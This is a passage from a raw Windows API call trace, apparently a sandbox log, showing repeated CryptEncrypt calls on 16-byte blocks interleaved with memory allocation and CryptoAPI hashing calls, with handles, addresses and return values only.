dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.829] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.829] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.829] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.829] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.829] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.830] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.830] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.830] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.830] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.830] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.830] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.830] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.830] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.830] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.830] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.830] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.830] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.830] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.830] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.830] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.830] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.830] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.830] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.830] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.831] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.831] malloc (_Size=0x1fd) returned 0x3def558 [0142.831] free (_Block=0x0) [0142.831] free (_Block=0x3def350) [0142.831] free (_Block=0x3df0420) [0142.831] malloc (_Size=0x1fd) returned 0x3def350 [0142.831] free (_Block=0x0) [0142.831] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.831] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.831] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.831] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.831] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.831] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.831] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.831] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.831] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.831] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.831] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.831] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.831] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.831] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.832] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.832] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.832] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.832] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.832] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.832] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.832] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.832] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.832] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.832] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.832] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.832] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.832] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.832] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.832] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.832] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.832] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.832] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.832] malloc (_Size=0x1fd) returned 0x3df0420 [0142.833] free (_Block=0x0) [0142.833] free (_Block=0x3def558) [0142.833] malloc (_Size=0x1fd) returned 0x3def558 [0142.833] free (_Block=0x0) [0142.833] CryptDuplicateHash (in: hHash=0x432eb8, pdwReserved=0x0, dwFlags=0x0, phHash=0x37dfb14 | out: phHash=0x37dfb14) returned 1 [0142.833] CryptHashData (hHash=0x4329b8, pbData=0x3def558, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0142.833] malloc (_Size=0x14) returned 0x3f65340 [0142.833] free (_Block=0x0) [0142.833] CryptGetHashParam (in: hHash=0x4329b8, dwParam=0x2, pbData=0x3f65340, pdwDataLen=0x37dfacc, dwFlags=0x0 | out: pbData=0x3f65340, pdwDataLen=0x37dfacc) returned 1 [0142.833] CryptHashData (hHash=0x432eb8, pbData=0x3def558, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0142.833] free (_Block=0x3f65340) [0142.833] CryptDestroyHash (hHash=0x4329b8) returned 1 [0142.833] free (_Block=0x3def558) [0142.833] free (_Block=0x3def350) [0142.833] malloc (_Size=0x1fd) returned 0x3def350 [0142.833] free (_Block=0x0) [0142.833] malloc (_Size=0x1f2) returned 0x3def558 [0142.833] free (_Block=0x0) [0142.834] malloc (_Size=0x1f2) returned 0x60cdc0 [0142.834] free (_Block=0x0) [0142.834] free (_Block=0x0) [0142.834] free (_Block=0x3def558) [0142.834] free (_Block=0x60cdc0) [0142.834] free (_Block=0x3def350) [0142.834] free (_Block=0x3df0420) [0142.834] malloc (_Size=0x1fd) returned 0x3df0420 [0142.834] free (_Block=0x0) [0142.834] malloc (_Size=0x1fd) returned 0x3def350 [0142.834] free (_Block=0x0) [0142.834] free (_Block=0x0) [0142.834] free (_Block=0x3df0420) [0142.834] malloc (_Size=0x1fd) returned 0x3df0420 [0142.834] free (_Block=0x0) [0142.834] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.834] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.835] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.835] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.835] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.835] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.835] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.835] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.835] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.835] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.835] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.835] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.835] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.835] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.835] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.835] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.835] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.835] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.835] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.835] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.835] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.836] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.836] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.836] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.836] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.836] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.836] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.836] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.836] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.836] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.836] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.836] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.836] malloc (_Size=0x1fd) returned 0x3def558 [0142.836] free (_Block=0x0) [0142.836] free (_Block=0x3def350) [0142.836] free (_Block=0x3df0420) [0142.836] malloc (_Size=0x1fd) returned 0x3def350 [0142.836] free (_Block=0x0) [0142.836] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.836] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.836] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.836] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.837] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.837] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.837] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.837] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.837] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.837] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.837] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.837] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 